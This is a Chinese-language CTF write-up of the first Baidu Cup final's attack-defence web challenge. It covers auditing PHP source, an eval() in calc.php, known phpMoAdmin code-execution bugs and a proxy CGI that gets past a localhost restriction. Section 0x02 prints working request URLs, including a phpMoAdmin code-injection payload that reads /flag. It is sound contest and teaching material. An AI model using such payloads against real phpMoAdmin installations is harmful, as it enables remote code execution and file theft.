第一届百度杯总决赛WriteUp for Web

0x00 前言

作为一个ctf菜鸡,第一次参加AWD模式的ctf,毫无经验的我只能被各位dalao吊打。很气

0x01 解题思路

由于是攻防赛制,比赛开始第一时间就上传自己写的phpwaf,主要作用还是记录日志用。
接着把源码下载下来,php文件基本都在/ez_web/admin,接着开始审计。

/ez_web/admin/calc.php
25行存在eval()函数,所以先不管他存不存在漏洞,第一时间注释掉,避免其他被其他选手拿到flag。(其实我也不知道该怎么利用,直到有dalao拿payload打我)

QQ截图20170407130620.png

/ez_web/admin/db_admin.php
phpMoAdmin是一款便捷的在线MongoDB管理工具,在网上可以搜到两个代码执行漏洞

QQ截图20170407131349.png
QQ截图20170407131423.png

/ez_web/cgi-bin/test.cgi
据说有破壳漏洞,由于没有复现成功所以就不提了。

这几个利用点都限制了127.0.0.1访问,所以要找其他利用点。
QQ截图20170407130109.png

/ez_web/cgi-bin/proxy.cgi
这里调用nodejs,运行的是一个http代理,可以利用这里突破127.0.0.1限制

QQ截图20170407132428.png

还有就是利用漏洞需要登录,所以先请求
/ez_web/cgi-bin/proxy.cgi?target=login.cgi&uname=haozi&passwd=so_easy,再拿session去利用漏洞

0x02 攻击对手

在一开始还没找到利用漏洞的时候,已经抓到了其他队的payload,所以先不管那么多,拿其他队的payload猛刷一波。

/ez_web/cgi-bin/proxy.cgi?target=login.cgi&uname=haozi&passwd=so_easy
/ez_web/admin/db_admin.php?collection=111&action=listRows&db=admin&find=array();echo%20file_get_contents('/flag');exit

一开始就修复了漏洞,所以我们队web没丢多少分,直到其他队的pwn开刷,看着分一直往下掉。dalao们真的是太可怕了

0x03 总结

还是太菜鸡了,被吊打,也认识到了自己不足的地方,需要提高自动化脚本的编写能力(手动刷flag太累了)

标签: ctf, 百度杯
返回文章列表 文章二维码
本页链接的二维码
打赏二维码